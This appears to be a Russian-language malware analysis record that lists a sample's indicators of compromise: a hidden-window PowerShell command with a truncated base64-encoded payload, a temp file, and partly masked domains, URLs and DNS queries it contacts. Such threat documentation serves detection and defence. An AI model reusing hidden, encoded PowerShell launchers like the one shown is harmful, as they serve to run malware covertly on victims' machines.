Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABQAHQAaABrAG8AaQBsAHAAbABxAHcAPQAnAEYAdQByAHEAZwBuAHQAawBkAGIAegBqAGUAJwA7ACQARQBqAHkAaAB0AGgAZABjAHYAeAB6ACAAPQAgACcANwA5ADMAJwA7ACQASgByAHIAcABzAHAAYQBwAHkAbgBmAD0AJwBTAHQAYgB...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1440
- %TEMP%\1233219.cvr
- 'la####ichowkusa.com':80
- 'la####ichowkusa.com':443
- 'x1.#.lencr.org':80
- 'ba####planet.com':443
- http://www.la####ichowkusa.com/emailwishlist/g3B/
- http://x1.#.lencr.org/
- 'la####ichowkusa.com':443
- 'ba####planet.com':443
- DNS ASK la####ichowkusa.com
- DNS ASK x1.#.lencr.org
- DNS ASK ad#####tycreative.com
- DNS ASK ba####planet.com
- DNS ASK he#####nlinea-chms.mx
- DNS ASK fo#####r.webinarbox.it
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w hidden -en JABQAHQAaABrAG8AaQBsAHAAbABxAHcAPQAnAEYAdQByAHEAZwBuAHQAawBkAGIAegBqAGUAJwA7ACQARQBqAHkAaAB0AGgAZABjAHYAeAB6ACAAPQAgACcANwA5ADMAJwA7ACQASgByAHIAcABzAHAAYQBwAHkAbgBmAD0AJwBTAHQAYgB... (со скрытым окном)